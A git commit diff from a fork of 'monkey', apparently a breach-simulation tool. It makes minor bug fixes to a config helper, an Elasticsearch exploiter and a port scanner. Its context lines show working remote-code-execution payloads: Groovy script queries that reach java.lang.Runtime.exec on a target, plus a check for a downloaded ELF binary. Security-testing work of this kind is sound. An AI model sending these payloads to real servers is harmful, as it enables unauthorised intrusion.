forked from p15670423/monkey
commit
3f54590785
|
@ -23,7 +23,7 @@ def _cast_by_example(value, example):
|
||||||
"""
|
"""
|
||||||
example_type = type(example)
|
example_type = type(example)
|
||||||
if example_type is str:
|
if example_type is str:
|
||||||
return str(os.path.expandvars(value))
|
return os.path.expandvars(value).encode("utf8")
|
||||||
elif example_type is tuple and len(example) != 0:
|
elif example_type is tuple and len(example) != 0:
|
||||||
if value is None or value == tuple([None]):
|
if value is None or value == tuple([None]):
|
||||||
return tuple()
|
return tuple()
|
||||||
|
|
|
@ -25,11 +25,11 @@ class ElasticGroovyExploiter(HostExploiter):
|
||||||
MONKEY_RESULT_FIELD = "monkey_result"
|
MONKEY_RESULT_FIELD = "monkey_result"
|
||||||
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
|
GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD
|
||||||
JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
|
JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
|
||||||
JAVA_GET_TMP_DIR =\
|
JAVA_GET_TMP_DIR = \
|
||||||
GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")'
|
GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")'
|
||||||
JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")'
|
JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")'
|
||||||
JAVA_CMD = GENERIC_QUERY \
|
JAVA_CMD = GENERIC_QUERY \
|
||||||
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
||||||
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
|
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
|
||||||
|
|
||||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||||||
|
@ -139,8 +139,8 @@ class ElasticGroovyExploiter(HostExploiter):
|
||||||
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
http_thread.join(self.DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
if (http_thread.downloads != 1) or (
|
if (http_thread.downloads != 1) or (
|
||||||
'ELF' not in
|
'ELF' not in
|
||||||
self.check_if_remote_file_exists_linux(target_path)):
|
self.check_if_remote_file_exists_linux(target_path)):
|
||||||
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||||||
return False
|
return False
|
||||||
return True
|
return True
|
||||||
|
@ -232,5 +232,5 @@ class ElasticGroovyExploiter(HostExploiter):
|
||||||
try:
|
try:
|
||||||
json_resp = json.loads(response.text)
|
json_resp = json.loads(response.text)
|
||||||
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
|
return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD]
|
||||||
except KeyError:
|
except (KeyError, IndexError):
|
||||||
return None
|
return None
|
||||||
|
|
|
@ -139,7 +139,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False):
|
||||||
"On host %s discovered the following ports %s" %
|
"On host %s discovered the following ports %s" %
|
||||||
(str(ip), ",".join([str(s[0]) for s in connected_ports_sockets])))
|
(str(ip), ",".join([str(s[0]) for s in connected_ports_sockets])))
|
||||||
banners = []
|
banners = []
|
||||||
if get_banner:
|
if get_banner and (len(connected_ports_sockets) != 0):
|
||||||
readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0)
|
readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0)
|
||||||
# read first BANNER_READ bytes
|
# read first BANNER_READ bytes
|
||||||
banners = [sock.recv(BANNER_READ) if sock in readable_sockets else ""
|
banners = [sock.recv(BANNER_READ) if sock in readable_sockets else ""
|
||||||
|
|
Loading…
Reference in New Issue